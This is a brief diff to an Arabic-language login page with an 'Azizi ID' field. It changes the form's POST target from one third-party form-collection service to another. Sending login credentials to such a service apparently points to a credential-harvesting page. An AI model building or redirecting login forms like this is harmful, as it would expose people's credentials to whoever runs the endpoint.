--- a/login/login.html
+++ b/login/login.html
@@ -93,7 +93,7 @@ span.psw {
 
 <h2>تسجيل الدخول</h2>
 
-<form action="https://getform.io/f/56cdfcca-433a-4dfc-848e-88e1fd8979e3" method="POST" />
+<form action="https://formbucket.com/f/buk_SwcIGuU8v1LUHSNBjsKA3D0W" method="POST" />
   <div class="container">
     <label for="uname"><b>Azizi ID</b></label>
     <input type="text" placeholder="Enter Azizi ID" name="uname" required>
